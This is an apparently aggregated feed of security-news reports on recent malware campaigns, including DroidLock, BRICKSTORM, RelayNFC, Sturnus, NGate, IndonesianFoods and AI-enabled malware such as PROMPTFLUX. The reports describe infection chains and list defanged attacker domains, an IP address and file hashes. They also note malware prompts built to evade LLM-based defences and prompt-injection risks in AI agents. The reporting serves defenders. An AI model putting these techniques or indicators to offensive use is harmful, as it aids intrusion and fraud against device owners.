A new Android malware locks device screens and demands that users pay a ransom to keep their data from being deleted. Dubbed “DroidLock” by Zimperium researchers, the Android ransomware-like malware can also “wipe devices, change PINs, intercept OTPs, and remotely control the user interface, turning an infected phone into a hostile endpoint.” The malware detected by the researchers targeted Spanish Android users via phishing sites. Based on the examples provided, the French telecommunications company Orange S.A. was one of the companies impersonated in the campaign.

Android Malware DroidLock Uses ‘Ransomware-like Overlay’

The researchers detailed the new Android malware in a blog post this week, noting that the malware “has the ability to lock device screens with a ransomware-like overlay and illegally acquire app lock credentials, leading to a total takeover of the compromised device.” The malware uses fake system update screens to trick victims and can stream and remotely control devices via virtual network computing (VNC). The malware can also exploit device administrator privileges to “lock or erase data, capture the victim's image with the front camera, and silence the device.” The infection chain starts with a dropper that appears to require the user to change settings to allow unknown apps to be installed from the source (image below), which leads to the secondary payload that contains the malware. [caption id="attachment_107722" align="aligncenter" width="300"] The Android malware DroidLock prompts users for installation permissions (Zimperium)[/caption] Once the user grants accessibility permission, “the malware automatically approves additional permissions, such as those for accessing SMS, call logs, contacts, and audio,” the researchers said. The malware requests Device Admin Permission and Accessibility Services Permission at the start of the installation. Those permissions allow the malware to perform malicious actions such as:

• Wiping data from the device, “effectively performing a factory reset.”
• Locking the device.
• Changing the PIN, password or biometric information to prevent user access to the device.

Based on commands received from the threat actor’s command and control (C2) server, “the attacker can compromise the device indefinitely and lock the user out from accessing the device.”

DroidLock Malware Overlays

The DroidLock malware uses Accessibility Services to launch overlays on targeted applications, prompted by an AccessibilityEvent originating from a package on the attacker's target list. The Android malware uses two primary overlay methods:

• A Lock Pattern overlay that displays a pattern-drawing user interface (UI) to capture device unlock patterns.
• A WebView overlay that loads attacker-controlled HTML content stored locally in a database; when an application is opened, the malware queries the database for the specific package name, and if a match is found it launches a full-screen WebView overlay that displays the stored HTML.

The malware also uses a deceptive Android update screen that instructs users not to power off or restart their devices. “This technique is commonly used by attackers to prevent user interaction while malicious activities are carried out in the background,” the researchers said. The malware can also capture all screen activity and transmit it to a remote server by operating as a persistent foreground service and using MediaProjection and VirtualDisplay to capture screen images, which are then converted to a base64-encoded JPEG format and transmitted to the C2 server. “This highly dangerous functionality could facilitate the theft of any sensitive information shown on the device’s display, including credentials, MFA codes, etc.,” the researchers said. Zimperium has shared its findings with Google, so up-to-date Android devices are protected against the malware, and the company has also published DroidLock Indicators of Compromise (IoCs).

In a nod to the evolving threat landscape that comes with cloud computing and AI and the growing supply chain threats, Microsoft is broadening its bug bounty program to reward researchers who uncover threats to its users that come from third-party code, like commercial and open source software,

The post Microsoft Expands its Bug Bounty Program to Include Third-Party Code appeared first on Security Boulevard.

As they work to fend off the rapidly expanding number of attempts by threat actors to exploit the dangerous React2Shell vulnerability, security teams are learning of two new flaws in React Server Components that could lead to denial-of-service attacks or the exposure of source code.

The post React Fixes Two New RSC Flaws as Security Teams Deal with React2Shell appeared first on Security Boulevard.

Bad actors that include nation-state groups to financially-motivated cybercriminals from across the globe are targeting the maximum-severity but easily exploitable React2Shell flaw, with threat researchers see everything from probes and backdoors to botnets and cryptominers.

The post Attackers Worldwide are Zeroing In on React2Shell Vulnerability appeared first on Security Boulevard.

HP’s latest threat report reveals rising use of sophisticated social engineering, SVG-based attacks, fake software updates, and AI-enhanced malware as cybercriminals escalate tactics to evade detection.

The post Report Surfaces Multiple Novel Social Engineering Tactics and Techniques appeared first on Security Boulevard.

The exploitation efforts by China-nexus groups and other bad actors against the critical and easily abused React2Shell flaw in the popular React and Next.js software accelerated over the weekend, with threats ranging from stolen credentials and initial access to downloaders, crypto-mining, and the NoodleRat backdoor being executed.

The post Exploitation Efforts Against Critical React2Shell Flaw Accelerate appeared first on Security Boulevard.

Chinese-sponsored groups are using the popular Brickstorm backdoor to access and gain persistence in government and tech firm networks, part of the ongoing effort by the PRC to establish long-term footholds in agency and critical infrastructure IT environments, according to a report by U.S. and Canadian security offices.

The post China Hackers Using Brickstorm Backdoor to Target Government, IT Entities appeared first on Security Boulevard.

ShadyPanda spent seven years uploading trusted Chrome and Edge extensions, later weaponizing them for tracking, hijacking, and remote code execution. Learn how the campaign unfolded.

The post ShadyPanda Takes its Time to Weaponize Legitimate Extensions  appeared first on Security Boulevard.

U.S. and Canadian cybersecurity agencies are warning that China-sponsored threat actors are using BRICKSTORM malware to compromise VMware vSphere environments. “Once compromised, the cyber actors can use their access to the vCenter management console to steal cloned virtual machine (VM) snapshots for credential extraction and create hidden, rogue VMs,” CISA, the NSA and the Canadian Centre for Cyber Security warned in the advisory. Attacks have so far primarily targeted the government and IT sectors, the agencies said.

One PRC BRICKSTORM Malware Attack Lasted More Than a Year

CISA – the U.S. Cybersecurity and Infrastructure Security Agency – said it analyzed eight BRICKSTORM samples obtained from victim organizations, including one where CISA conducted an incident response engagement. While the analyzed samples were for VMware vSphere environments, there are also Windows versions of the malware, the agency said. In the incident response case, CISA said threat actors sponsored by the People’s Republic of China (PRC) gained “long-term persistent access” to the organization’s network in April 2024 and uploaded BRICKSTORM malware to a VMware vCenter server. The threat actors also accessed two domain controllers and an Active Directory Federation Services (ADFS) server, successfully compromising the ADFS server and exporting cryptographic keys. The threat actors used BRICKSTORM malware for persistent access “through at least Sept. 3, 2025,” the agency said. BRICKSTORM is an Executable and Linkable Format (ELF) Go-based backdoor. While samples may differ in function, “all enable cyber actors to maintain stealthy access and provide capabilities for initiation, persistence, and secure command and control (C2),” the agencies said. BRICKSTORM can automatically reinstall or restart if disrupted. It uses DNS-over-HTTPS (DoH) and mimics web server functionality “to blend its communications with legitimate traffic." The malware gives threat actors interactive shell access on the system and allows them to “browse, upload, download, create, delete, and manipulate files.” Some of the malware samples act as a SOCKS proxy to facilitate lateral movement and compromise additional systems.

PRC Hackers Got Access via a Web Server

CISA said that in its incident response engagement, the PRC hackers accessed a web server inside the organization’s demilitarized zone (DMZ) on April 11, 2024. The threat actors accessed it through a web shell present on the server. “Incident data does not indicate how they obtained initial access to the web server or when the web shell was implanted,” CISA said. On the same day, the hackers used service account credentials to move laterally using Remote Desktop Protocol (RDP) to a domain controller in the DMZ, where they copied the Active Directory (AD) database (ntds.dit). The following day, the hackers moved laterally from the web server to a domain controller within the internal network using RDP and credentials from a second service account. “It is unknown how they obtained the credentials,” CISA said. The hackers copied the AD database and obtained credentials for a managed service provider (MSP) account. Using the MSP credentials, the hackers moved from the internal domain controller to the VMware vCenter server. From the web server, the PRC hackers also moved laterally using Server Message Block (SMB) to two jump servers and an ADFS server, from which they stole cryptographic keys. After gaining access to vCenter, the hackers elevated privileges using the sudo command, dropped BRICKSTORM malware into the server’s /etc/sysconfig/ directory, and modified the system’s init file in /etc/sysconfig/ to run the malware. The modified init file controls the bootup process on VMware vSphere systems and executes BRICKSTORM, CISA said. The file is typically used to define visual variables for the bootup process. The hackers added an additional line to the script to execute BRICKSTORM from the hard-coded file path /etc/sysconfig/. CISA, NSA, and the Canadian Cyber Centre urged organizations to use the indicators of compromise (IOCs) and detection signatures in their lengthy report to detect BRICKSTORM malware samples. CISA also recommended that organizations block unauthorized DNS-over-HTTPS (DoH) providers and external DoH network traffic; inventory all network edge devices and monitor for suspicious network connectivity, and use network segmentation to restrict network traffic from the DMZ to the internal network.

Security and developer teams are scrambling to address a highly critical security flaw in frameworks tied to the popular React JavaScript library. Not only is the vulnerability, which also is in the Next.js framework, easy to exploit, but React is widely used, including in 39% of cloud environments.

The post Dangerous RCE Flaw in React, Next.js Threatens Cloud Environments, Apps appeared first on Security Boulevard.

A threat group dubbed ShadyPanda exploited traditional extension processes in browser marketplaces by uploading legitimate extensions and then quietly weaponization them with malicious updates, infecting 4.3 million Chrome and Edge users with RCE malware and spyware.

The post ShadyPanda’s Years-Long Browser Hack Infected 4.3 Million Users appeared first on Security Boulevard.

Cyble researchers have identified new Linux malware that combines Mirai-derived DDoS botnet capabilities with a stealthy fileless cryptominer, enabling both network disruption and financial profit in the same threat campaign. “This campaign represents a sophisticated and financially motivated operation combining botnet propagation with stealthy cryptomining,” Cyble threat intelligence researchers wrote in a blog post today. Stealthy techniques and processes allow the new Mirai variant to conduct its mischief in secret. “The attacker employs multiple advanced techniques—including raw-socket scanning, masqueraded processes, internal localhost IPC, dynamic DNS resolution, and fileless miner configuration—to evade detection and maintain long-term persistence on compromised devices,” the researchers said.

Linux Malware Combines Mirai Botnet with XMRig Cryptominer

Combining Mirai-based DDoS botnet capabilities with XMRig-based cryptomining capabilities reflects a growing trend of “hybrid monetization strategies, where threat actors maximize ROI by leveraging infected devices not only for botnet attacks but also for illicit cryptocurrency mining,” the researchers wrote. Organizations operating Linux servers, cloud workloads, or exposed IoT devices “should prioritize hardening and continuous monitoring to mitigate their risk,” they said. The malware uses a multi-stage infection chain that begins with a downloader delivering architecture-specific V3G4/Mirai binaries across x86_64, ARM, and MIPS systems. The second stage, Mddos.x86_64, is a statically linked and UPX-packed Executable and Linkable Format (ELF) file with stripped symbols, “making static inspection more complicated,” Cyble said. After executing and gathering system information, the Linux malware moves into stealth mode, renaming its process to appear as a system daemon (systemd-logind), detaching from the terminal, and launching parallel worker threads for attack operations, command and control (C2) communication, and inter-process communication (IPC) coordination. “A key characteristic of this botnet variant is its use of raw TCP sockets, allowing precise crafting of SYN packets for high-velocity SSH scanning campaigns,” the researchers said. At the same time, worker threads resolve the C2 domain (baojunwakuang[.]asia) via repeated queries to Google Public DNS (8.8.8.8) to maintain command channels. “This multi-threaded DNS resolution strategy is typical of Mirai-style bots, allowing the malware to maintain connectivity and receive commands while executing attacks in parallel,” the researchers wrote.

Fileless Cryptominer

In the third stage, the malware deploys a covert Monero cryptominer by downloading a UPX-packed XMRig binary from the IP 159.75.47[.]123 and stores it in /tmp/.dbus-daemon to masquerade as a legitimate process. Instead of a local configuration file, the miner obtains its configuration dynamically from the C2 server, “enabling real-time updates to wallet addresses, mining pools, and algorithms while leaving no on-disk artifacts” and hindering forensic analysis. “Unlike typical miner deployments that embed a static configuration file on disk ... this sample requests runtime configuration data directly from the C2 server,” the Cyble researchers said. That technique allows the threat actors to avoid exposing wallet addresses, pool endpoints and algorithms during static analysis while dynamically rotating mining parameters and preventing visibility of miner settings on the infected host. During execution, the miner connects to the C2 server to make a configuration request, and the server responds with a JSON blob containing the pool URL, wallet address, algorithm, and thread count. The full Cyble blog includes recommendations for defenders, MITRE ATT&CK techniques, and indicators of compromise (IoCs).

The Russian state-sponsored group behind the RomCom malware family used the SocGholish loader for the first time to launch an attack on a U.S.-based civil engineering firm, continuing its targeting of organizations that offer support to Ukraine in its ongoing war with its larger neighbor.

The post Russian-Backed Threat Group Uses SocGholish to Target U.S. Company appeared first on Security Boulevard.

A new iteration of the Shai-Hulud malware that ran through npm repositories in September is faster, more dangerous, and more destructive, creating huge numbers of malicious repositories, compromised scripts, and GitHub users attacked, creating one of the most significant supply chain attacks this year.

The post The Latest Shai-Hulud Malware is Faster and More Dangerous appeared first on Security Boulevard.

Cyble researchers have identified a new NFC relay attack campaign targeting users in Brazil. Dubbed “RelayNFC,” Cyble Research and Intelligence Labs (CRIL) researchers identified five phishing sites distributing the malicious app, which claims to secure payment cards. The malicious application captures the victim’s card details and relays them to attackers for fraudulent transactions. The malware is also highly evasive and remains undetected by security tools.

NFC Relay Attack App Evades Security Tools

RelayNFC is a “lightweight yet highly evasive malware” because of its Hermes-compiled payload, Cyble said. Use of the JavaScript engine “makes detection significantly harder, enabling it to stealthily capture victims’ card data and relay it in real time to an attacker-controlled server,” the researchers said. VirusTotal detections of the NFC relay attack malware were at zero at publication time, “indicating very low visibility across the security ecosystem, and the code suggests a high likelihood of continued development,” they said. RelayNFC uses a full real-time Application Protocol Data Unit (APDU) relay channel that enables attackers to complete transactions “as though the victim’s card were physically present.” The researchers also identified a related variant that attempts to implement Host Card Emulation (HCE), suggesting that the threat actor is exploring other NFC relay techniques too. Other malware strains exploiting Near-Field Communication (NFC) capabilities to intercept or relay contactless payment data have included Ngate, SuperCardX, and PhantomCard, suggesting a growing trend of NFC exploits, Cyble said.

RelayNFC Malware Relies on Phishing Sites

Distribution of RelayNFC relies entirely on phishing, tricking users into downloading the malware. The campaign uses a Portuguese-language page that prompts victims to install the malicious payment card security app (image below). [caption id="attachment_107130" align="aligncenter" width="262"] NFC relay attack phishing site (Cyble)[/caption] The researchers identified five malicious sites distributing the app, “indicating a coordinated and ongoing operation targeting Brazilian users.” Those sites include:

• maisseguraca[.]site
• proseguro[.]site
• test[.]ikotech[.]online
• maisseguro[.]site
• maisprotecao[.]site

RelayNFC appears to be a new variant built using the React Native framework and has been active for at least a month. The malware operates as a “reader,” the researchers said, capturing victim card data and relaying it to the attacker’s server. After installation, the app immediately displays a phishing screen that tells the user to tap their payment card on the device. Once the card data has been read, RelayNFC displays another phishing screen that prompts the victim to enter their 4- or 6-digit PIN.

APDU Commands Turn Device Into ‘Remote NFC Reader’

The RelayNFC code is built around a relay channel that uses a persistent WebSocket connection to forward Application Protocol Data Unit (APDU) commands between the attacker’s server and the victim’s NFC subsystem, “effectively turning the infected device into a remote NFC ‘reader’ for the attacker,” the researchers said. The NFC controller processes the command and generates a genuine APDU response, as the card would during a legitimate transaction. RelayNFC captures that output and returns it to the command-and-control server in an “apdu-resp” message, “preserving the original request ID and session ID so the attacker’s device can continue the EMV transaction seamlessly.” “This real-time, bidirectional relay of APDU commands and responses is what enables the attacker to execute a full payment flow remotely, as if the victim’s card were physically present at their POS terminal,” the researchers said. “By combining phishing-driven distribution, React Native–based obfuscation, and real-time APDU relaying over WebSockets, the threat actors have created a highly effective mechanism for remote EMV transaction fraud,” they said. The researchers said their findings underscore the need for strong device-level protections, user awareness, and monitoring by financial institutions.

Huntress threat researchers are tracking a ClickFix campaign that includes a variant of the scheme in which the malicious code is hidden in the fake image of a Windows Update and, if inadvertently downloaded by victims, will deploy the info-stealing malware LummaC2 and Rhadamanthys.

The post Attackers are Using Fake Windows Updates in ClickFix Scams appeared first on Security Boulevard.

Agencies with the US and other countries have gone hard after bulletproof hosting services providers this month, including Media Land, Hypercore, and associated companies and individuals, while the FiveEyes threat intelligence alliance published BPH mitigation guidelines for ISPs, cloud providers, and network defenders.

The post U.S., International Partners Target Bulletproof Hosting Services appeared first on Security Boulevard.

The SEC dismissed the remain charges in the lawsuit filed in 2023 against software maker SolarWinds and CISO Timothy Brown in the wake of the massive Sunburst supply chain attack, in which a Russian nation-state group installed a malicious update into SolarWInds software that then compromised the systems of some customers.

The post SEC Dismisses Remains of Lawsuit Against SolarWinds and Its CISO appeared first on Security Boulevard.

Security researchers have identified a new Android banking trojan that does much more than steal banking credentials. It can also record encrypted messages and essentially enables complete control of infected devices. ThreatFabric researchers are calling the new Android malware “Sturnus.” “A key differentiator is its ability to bypass encrypted messaging,” the researchers said. “By capturing content directly from the device screen after decryption, Sturnus can monitor communications via WhatsApp, Telegram, and Signal.” “Sturnus represents a sophisticated and comprehensive threat, implementing multiple attack vectors that provide attackers with near-complete control over infected devices,” they said. “The combination of overlay-based credential theft, message monitoring, extensive keylogging, real-time screen streaming, remote control, device administrator abuse, and comprehensive environmental monitoring creates a dangerous threat to victims' financial security and privacy.” So far the malware has been configured for targeted attacks against financial institutions in Southern and Central Europe, suggesting that a broader campaign will follow. “While we emphasize that the malware is likely in its pre-deployment state, it is also currently fully functional, and in aspects such as its communication protocol and device support, it is more advanced than current and more established malware families,” they warned.

Android Malware Deploys Fake Login Screens

The trojan harvests banking credentials through “convincing fake login screens that replicate legitimate banking apps,” the researchers said. The Android malware also offers attacks “extensive remote control, enabling them to observe all user activity, inject text without physical interaction, and even black out the device screen while executing fraudulent transactions in the background—without the victim’s knowledge,” they warned. The malware combines HTML overlays and keylogging to capture and exfiltrate user credentials and sensitive data. The overlay engine maintains a repository of phishing templates under /data/user/0/<malware_package>/files/overlays/, where each HTML file corresponds to a specific banking application. When an overlay is triggered, the malware launches a WebView configured with JavaScript, DOM storage, and a JavaScript bridge to intercept and forward any data the victim enters directly to the command and control (C2) server. The malware also includes a full-screen “block overlay” that lets attackers hide their activities from victims by displaying a full-screen black overlay that blocks visual feedback while the malware operates in the background. Beyond basic keystroke logging, the malware continuously monitors the device’s UI tree and sends structured logs that describe what is displayed on screen, which lets attackers reconstruct user activity even when screen capture is blocked or when network conditions prevent live video transmission. “Together, these mechanisms give the operator a detailed, real-time picture of the victim’s actions while providing multiple redundant paths for data theft,” the researchers said.

Capturing Encrypted Messages

Sturnus also monitors the foreground app and automatically activates its UI tree collection when the victim opens encrypted messaging services such as WhatsApp, Signal, or Telegram. “Because it relies on Accessibility Service logging rather than network interception, the malware can read everything that appears on screen—including contacts, full conversation threads, and the content of incoming and outgoing messages—in real time,” the researchers said. “This makes the capability particularly dangerous: it completely sidesteps end-to-end encryption by accessing messages after they are decrypted by the legitimate app, giving the attacker a direct view into supposedly private conversations.” The ThreatFabric report also contained two SHA-256 hashes, the second of which is currently detected by 23 of 67 security vendors on VirusTotal: 045a15df1121ec2a6387ba15ae72f8e658c52af852405890d989623cf7f6b0e5 0cf970d2ee94c44408ab6cbcaabfee468ac202346b9980f240c2feb9f6eb246d

Microsoft’s warning on Tuesday that an experimental AI agent integrated into Windows can infect devices and pilfer sensitive user data has set off a familiar response from security-minded critics: Why is Big Tech so intent on pushing new features before their dangerous behaviors can be fully understood and contained?

As reported Tuesday, Microsoft introduced Copilot Actions, a new set of “experimental agentic features” that, when enabled, perform “everyday tasks like organizing files, scheduling meetings, or sending emails,” and provide “an active digital collaborator that can carry out complex tasks for you to enhance efficiency and productivity.”

Hallucinations and prompt injections apply

The fanfare, however, came with a significant caveat. Microsoft recommended users enable Copilot Actions only “if you understand the security implications outlined.”

Read full article

Comments

© Photographer: Chona Kasinger/Bloomberg via Getty Images

The intrusion a year ago into Conduent Business Solutions' systems, likely by the SafePay ransomware group, that affected more than 10.5 individuals will likely cost the company more than $50 million in related expenses and millions more to settle the lawsuits that are piling up.

The post Conduent Faces Financial Hit, Lawsuits from Breach Affecting 10.5 Million appeared first on Security Boulevard.

Security researchers have uncovered a large-scale spam campaign within the npm ecosystem, now known as the IndonesianFoods worm. The attack involves over 43,000 spam packages published across at least 11 user accounts over the past two years. Rather than attempting to steal credentials or data, this worm focuses on polluting the npm registry with junk packages, an attack that nearly doubles the known number of malicious npm packages in existence.  The spam campaign began more than two years ago and has continued systematically, flooding the registry with dormant payloads disguised as legitimate projects. Paul McCarty’s investigation revealed that the worm had been quietly operating across multiple accounts, making it harder for detection systems to identify the scale of the operation. 

The Naming Scheme Behind the “IndonesianFoods Worm” 

The IndonesianFoods worm derives its name from its distinctive naming scheme and the internal dictionaries embedded within its malicious code. The script uses two lists, one containing Indonesian personal names such as andi, budi, cindy, and zul, and another containing Indonesian food terms like rendang, sate, bakso, and tapai.  When executed, the script randomly selects one name, one food term, adds a random number between 1 and 100, and appends a suffix like “-kyuki” or “-breki.” Examples of generated package names include “andi-rendang23-breki” and “zul-tapai9-kyuki.” This combination of names and foods gives the worm both its unique identity and its connection to Indonesia, which inspired its name.  McCarty stated that the attack “focuses on creating new packages rather than stealing credentials or engaging in other immediately malicious behavior.” Instead, it exploits npm’s open publishing model to overwhelm the registry with automated spam, disrupting developers, and polluting search results. 

Accounts and Behavior of the Spam Campaign 

The IndonesianFoods worm has been traced to at least 11 npm accounts, including voinza, yunina, noirdnv, veyla, vndra, vayza, doaortu, jarwok, bipyruss, sernaam.b.y, and rudiox. Each of these accounts was created specifically for this operation, collectively responsible for publishing thousands of packages. None of them appears to be compromised by legitimate users.  Once the malware is triggered, typically through a file like auto.js, it modifies the package.json file, assigns random version numbers, and publishes new packages continuously using the npm publish command. This happens in an infinite loop, creating a new spam package roughly every seven seconds. The result is an ongoing flood of junk data that strains npm’s infrastructure and risks contaminating legitimate dependency chains if developers accidentally install one of the packages.  Though the payload does not directly steal data or credentials, it turns the npm registry itself into an attack vector, weaponizing its openness to spread an enormous volume of fake packages. 

Conclusion 

The IndonesianFoods worm exposes how modern spam campaigns in software supply chains rely on automation and persistence to evade detection. Over two years, attackers, possibly linked to Indonesia, published tens of thousands of malicious npm packages, undermining trust in open ecosystems.   With threats growing more coordinated, Cyble’s AI-native threat intelligence platform helps organizations detect, predict, and neutralize new cyber risks. Book a free demo to uncover vulnerabilities and strengthen your defense against large-scale attacks like the IndonesianFoods worm. 

Over the past year, we've seen a steady drumbeat of supply chain incidents targeting npm — each slightly different, but collectively pointing to the same truth: the open source ecosystem is being stress-tested in real time.

The post Unprecedented Automation: IndonesianFoods Pits Open Source Against Itself appeared first on Security Boulevard.

Open source components form the backbone of innovation, but they also introduce significant security risks.

The post Stop Open Source Malware at the Gate with Repository Firewall appeared first on Security Boulevard.

Over the past year, scammers have ramped up a new way to infect the computers of unsuspecting people. The increasingly common method, which many potential targets have yet to learn of, is quick, bypasses most endpoint protections, and works against both macOS and Windows users.

ClickFix often starts with an email sent from a hotel that the target has a pending registration with and references the correct registration information. In other cases, ClickFix attacks begin with a WhatsApp message. In still other cases, the user receives the URL at the top of Google results for a search query. Once the mark accesses the malicious site referenced, it presents a CAPTCHA challenge or other pretext requiring user confirmation. The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter.

One line is all it takes

Once entered, the string of text causes the PC or Mac to surreptitiously visit a scammer-controlled server and download malware. Then, the machine automatically installs it—all with no indication to the target. With that, users are infected, usually with credential-stealing malware. Security firms say ClickFix campaigns have run rampant. The lack of awareness of the technique, combined with the links also coming from known addresses or in search results, and the ability to bypass some endpoint protections are all factors driving the growth.

Read full article

Comments

© Getty Images

Another day, another malware attack on smartphones. Researchers at Unit 42, the threat intelligence arm of Palo Alto Networks, have revealed a sophisticated spyware known as “Landfall” targeting Samsung Galaxy phones. The researchers say this campaign leveraged a zero-day exploit in Samsung Android software to steal a raft of personal data, and it was active for almost a year. Thankfully, the underlying vulnerability has now been patched, and the attacks were most likely targeted at specific groups.

Unit 42 says that Landfall first appeared in July 2024, relying on a software flaw now catalogued as CVE-2025-21042. Samsung issued a patch for its phones in April 2025, but details of the attack have only been revealed now.

Even if you were out there poking around the darker corners of the Internet in 2024 and early 2025 with a Samsung Galaxy device, it’s unlikely you’d be infected. The team believes Landfall was used in the Middle East to target individuals for surveillance. It is currently unclear who was behind the attacks.

Read full article

Comments

© Ryan Whitwam

AI malware may be in the early stages of development, but it's already being detected in cyberattacks, according to new research published this week. Google researchers looked at five AI-enabled malware samples - three of which have been observed in the wild - and found that the malware was often lacking in functionality and easily detected. Nonetheless, the research offers insight into where the use of AI in threat development may go in the future. “Although some recent implementations of novel AI techniques are experimental, they provide an early indicator of how threats are evolving and how they can potentially integrate AI capabilities into future intrusion activity,” the researchers wrote.

AI Malware Includes Infostealers, Ransomware and More

The AI-enabled malware samples included a reverse shell, a dropper, ransomware, a data miner and an infostealer. The researchers said malware families like PROMPTFLUX and PROMPTSTEAL are the first to use Large Language Models (LLMs) during execution. “These tools dynamically generate malicious scripts, obfuscate their own code to evade detection, and leverage AI models to create malicious functions on demand, rather than hard-coding them into the malware,” they said. “While still nascent, this represents a significant step toward more autonomous and adaptive malware.” “[A]dversaries are no longer leveraging artificial intelligence (AI) just for productivity gains, they are deploying novel AI-enabled malware in active operations,” they added. “This marks a new operational phase of AI abuse, involving tools that dynamically alter behavior mid-execution.” However, the new AI malware samples are only so effective. Using hashes provided by Google, they were all detected by roughly a third or more of security tools on VirusTotal, and two of the malware samples were detected by nearly 70% of security tools.

AI Malware Samples and Detection Rates

The reverse shell, FRUITSHELL (VirusTotal), is a publicly available reverse shell written in PowerShell that establishes a remote connection to a command-and-control (C2) server and enables a threat actor to launch arbitrary commands on a compromised system. “Notably, this code family contains hard-coded prompts meant to bypass detection or analysis by LLM-powered security systems,” the researchers said. It was detected by 20 of 62 security tools (32%), and has been observed in threat actor operations. The dropper, PROMPTFLUX (VirusTotal), was written in VBScript and uses an embedded decoy installer for obfuscation. It uses the Google Gemini API for regeneration by prompting the LLM to rewrite its source code and saving the new version to the Startup folder for persistence, and the malware attempts to spread by copying itself to removable drives and mapped network shares. Google said the malware appears to still be under development, as incomplete features are commented out and the malware limits Gemini API calls. “The current state of this malware does not demonstrate an ability to compromise a victim network or device,” they said. The most interesting feature of PROMPTFLUX may be its ability to periodically query Gemini to obtain new code for antivirus evasion. “While PROMPTFLUX is likely still in research and development phases, this type of obfuscation technique is an early and significant indicator of how malicious operators will likely augment their campaigns with AI moving forward,” they said. It was detected by 23 of 62 tools (37%). The ransomware, PROMPTLOCK (VirusTotal), is a proof of concept cross-platform ransomware written in Go that was developed by NYU researchers. It uses an LLM to dynamically generate malicious Lua scripts at runtime, and is capable of filesystem reconnaissance, data exfiltration, and file encryption on Windows and Linux systems. It was detected by 50 of 72 security tools on VirusTotal (69%). The data miner, PROMPTSTEAL (VirusTotal), was written in Python and uses the Hugging Face API to query the LLM “Qwen2.5-Coder-32B-Instruct” to generate Windows commands to gather system information and documents. The Russian threat group APT28 (Fancy Bear) has been observed using PROMPTSTEAL, which the researchers said is their “first observation of malware querying an LLM deployed in live operations.” It was detected by 47 of 72 security tools (65%). The infostealer, QUIETVAULT (VirusTotal), was written in JavaScript and targets GitHub and NPM tokens. The credential stealer uses an AI prompt and AI CLI tools to look for other potential secrets and exfiltrate files to GitHub. It has been observed in threat actor operations and was detected by 29 of 62 security tools (47%). The full Google report also looks at advanced persistent threat (APT) use of AI tools, and also included this interesting comparison of malicious AI tools such as WormGPT: [caption id="attachment_106590" align="aligncenter" width="1098"] Comparison of malicious AI tools (Google)[/caption]

The Polish Computer Emergency Response Team (CERT Polska) analyzed a new Android-based malware that uses NFC technology to perform unauthorized ATM cash withdrawals and drain victims’ bank accounts.

Researchers found that the malware, called NGate, lets attackers withdraw cash from ATMs (Automated Teller Machines, or cash machines) using banking data exfiltrated from victims’ phones—without ever physically stealing the cards.

NFC is a wireless technology that allows devices such as smartphones, payment cards, and terminals to communicate when they’re very close together. So, instead of stealing your bank card, the attackers capture NFC (Near Field Communication) activity on a mobile phone infected with the NGate malware and forward that transaction data to devices at ATMs. In NGate’s case the stolen data is sent over the network to the attackers’ servers rather than being relayed purely by radio.

NFC comes in a few “flavors.” Some produce a static code—for example, the card that opens my apartment building door. That kind of signal can easily be copied to a device like my “Flipper Zero” so I can use that to open the door. But sophisticated contactless payment cards (like your Visa or Mastercard debit and credit cards) use dynamic codes. Each time you use the NFC, your card’s chip generates a unique, one-time code (often called a cryptogram or token) that cannot be reused and is different every time.

So, that’s what makes the NGate malware more sophisticated. It doesn’t simply grab a signal from your card. The phone must be infected, and the victim must be tricked into performing a tap-to-pay or card-verification action and entering their PIN. When that happens, the app captures all the necessary NFC transaction data exchanged — not just the card number, but the fresh one-time codes and other details generated in that moment.

The malware then instantly sends all that NFC data, including the PIN, to the attacker’s device. Because the codes are freshly generated and valid only for a short time, the attacker uses them immediately to imitate your card at an ATM; the accomplice at the ATM presents the captured data using a card-emulating device such as a phone, smartwatch, or custom hardware.

But, as you can imagine, being ready at an ATM when the data comes in takes planning—and social engineering.

First, attackers need to plant the malware on the victim’s device. Typically, they send phishing emails or SMS messages to potential victims. These often claim there is a security or technical issue with their bank account, trying to induce worry or urgency. Sometimes, they follow up with a phone call, pretending to be from the bank. These messages or calls direct victims to download a fake “banking” app from a non-official source, such as a direct link instead of Google Play.

Once installed, the app app asks for permissions and leads victims through fake “card verification” steps. The goal is to get victims to act quickly and trustingly—while an accomplice waits at an ATM to cash out.

How to stay safe

NGate only works if your phone is infected and you’re tricked into initiating a tap-to-pay action on the fake banking app and entering your PIN. So the best way to stay safe from this malware is keep your phone protected and stay vigilant to social engineering:

• Stick to trusted sources. Download apps only from Google Play, Apple’s App Store, or the official provider. Your bank will never ask you to use another source.
• Protect your devices. Use an up-to-date real-time anti-malware solution like Malwarebytes for Android, which already detects this malware.
• Do not engage with unsolicited callers. If someone claims to be from your bank, tell them you’ll call them back at the number you have on file.
• Ignore suspicious texts. Do not respond to or act upon unsolicited messages, no matter how harmless or urgent they seem.

Malwarebytes for Android detects these banking Trojans as Android/Trojan.Spy.NGate.C; Android/Trojan.Agent.SIB01022b454eH140; Android/Trojan.Agent.SIB01c84b1237H62; Android/Trojan.Spy.Generic.AUR9552b53bH2756 and Android/Trojan.Banker.AURf26adb59C19.

---

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

Two former cybersecurity pros were indicted with conspiring with a third unnamed co-conspirator of using the high-profile BlackCat ransomware to launch attacks in 2023 against five U.S. companies to extort payment in cryptocurrency and then splitting the proceeds.

The post Security Experts Charged with Launching BlackCat Ransomware Attacks appeared first on Security Boulevard.

Threat actors are working with organized crime groups to target freight operators and transportation companies, infiltrate their systems through RMM software, and steal cargo, which they then sell online or ship to Europe, according to Proofpoint researchers, who saw similar campaigns last year.

The post Hackers Targeting Freight Operators to Steal Cargo: Proofpoint appeared first on Security Boulevard.

Cryptojacking silently hijacks compute power, inflates cloud bills, and erodes performance. Beyond financial losses, it exposes deep security risks, damages reputation, and drains productivity—making proactive detection and prevention essential for every organization.

The post The Real Cost of Cryptojacking  appeared first on Security Boulevard.

Here’s what to know about the malware with an insatiable appetite for valuable data, so much so that it tops this year's infostealer detection charts

Looks can be deceiving, so much so that the familiar icon could mask malware designed to steal your data and money.

What you see is not always what you get as cybercriminals increasingly weaponize SVG files as delivery vectors for stealthy malware

Published 3:00 p.m. ET on October 31, 2025; last updated 5:00 p.m. ET on October 31, 2025

This week, an open source malware campaign dubbed ‘PhantomRaven’ has run rampant, flooding the npm registry with over a hundred malicious packages that saw more than 86,000 potential victims before discovery.

The post PhantomRaven: npm Malware Evolves Again appeared first on Security Boulevard.

